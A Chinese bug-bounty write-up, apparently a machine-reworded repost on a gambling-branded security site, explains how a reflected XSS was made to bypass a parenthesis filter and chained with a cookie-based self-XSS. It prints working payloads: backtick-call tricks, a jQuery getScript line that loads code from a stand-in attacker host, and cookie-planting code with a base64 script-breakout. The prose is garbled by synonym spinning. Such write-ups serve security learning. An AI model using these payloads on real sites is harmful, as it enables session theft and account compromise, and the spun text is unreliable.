讲述从Self-XSS到能利用的xss | 申博官网
登录
  • 欢迎进入Sunbet!
  • 如果您觉得Sunbet对你有帮助,那么赶紧使用Ctrl+D 收藏Sunbet并分享出去吧
  • 您好,这里是Sunbet!

讲述从Self-XSS到能利用的xss

Sunbet_安全防护 申博 234次浏览 已收录 0个评论

上个月我收到来自Synack团队的私有赏金义务,末了我在网站中发明了一个反射型xss。由于这是私有赏金义务,我不克不及在writeup中提到目的的信息。然则我会演示我是如何绕过种种限定的。我末了得到了$272,由于我没有证实我能接见dom工具。由于网站限定了圆括号,以是我不克不及接见到dom,而且我不克不及实行像下面如许的payload:

alert(document.domain)

一般情况下,上面的JavaScript代码实行后会有下面截图中的结果

讲述从Self-XSS到能利用的xss

alert`document.domain`

由于圆括号被过滤,我就用`字符来实行我的函数。不幸的是,当下面的函数被实行的时刻,你不会接见dom资本。下面的截图是一个简朴的例子。
讲述从Self-XSS到能利用的xss
我提交了这个申报,而且取得了$272,但是若是我通知他们我能完成dom的接见,我就可以或许分外取得一份赏金,以是很天然我最先了这一项应战。我跟Brutelogic (Brute)说了这件事,然后向他征询了一些绕过手艺,然后他通知我可以或许参考他的xss备忘录。当我进修他的文档时,我发明下面的这段payload:

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

setTimeout`alert\x28document.domain\x29`

这个payload可以或许完成我须要的结果,就是随便接见dom。我从新提交了新的payload,这个payload展现了我可以或许随便接见网页的dom资本,然后我取得了分外的60块钱。然则我没有就此停手。早些时刻,我在破绽收取范围内的子域名下发明一个Self-XSS。cookie中有一个被base64编码了的参数,这个参数可致使xss。典范的基于cookie的xss,然则它没法被应用,除非攻击者能给客户浏览器设置cookie。荣幸的是,我如今手上有一个xss了,就是我上面提到的。但是我的payload不克不及太长,不然就会失利。我晓得,若是我想实行一些有攻击力的payload的话,那我必需嵌入外部的JavaScript文件,由于即使是最简朴的payload都邑由于太长而不会实行胜利。我也好像不克不及嵌入包罗payload的外部JavaScript文件,以用来设置cookie的属性。由于它照样太长了。然则,我注重破绽页面用了jQuery,这就可以或许够让我用一些充足短的语句来嵌入剧本文件。下面是我用到的代码:

$.getScript`//xss.example.com/xss.js`

如今,我只须要用JavaScript代码把payload base64编码,然后放入cookie中的谁人有破绽的参数中就可以或许够了。下面就是我用到的代码:

$('html').html('<h1>Click the button below to continue.</h1><input type="submit" value="Click Me" onclick=setCookieRedir() />');
function setCookieRedir(){
        document.cookie = "vulnerableCookie=LS0+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOy8v;path=/;domain=.example.com;";
    window.location = "https://example.com/vulnerablePage.html";
}

上面的代码会把网页的上半局部文本替换成”点击下面这个按钮就可以或许够继承“,下面会带有一个按钮。当受害者点击这个按钮时,js代码就会设置谁人有破绽的cookie参数为下面的字符串

LS0+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOy8v

上面的字符串经由base64解码以后就是下面的代码,它就会在有破绽的页面上弹窗

--></script><script>alert(document.domain);//

末了,我想这是一个异常风趣的破绽应用历程,当我赓续的实验绕过期,我也感觉到了异常多的兴趣。末了,我由于把Self-XSS变成了可应用的xss,我取得了$616,另外,我还由于上文提到的破绽应用链取得了$272 + $60的赏金。


Sunbet|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明讲述从Self-XSS到能利用的xss
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址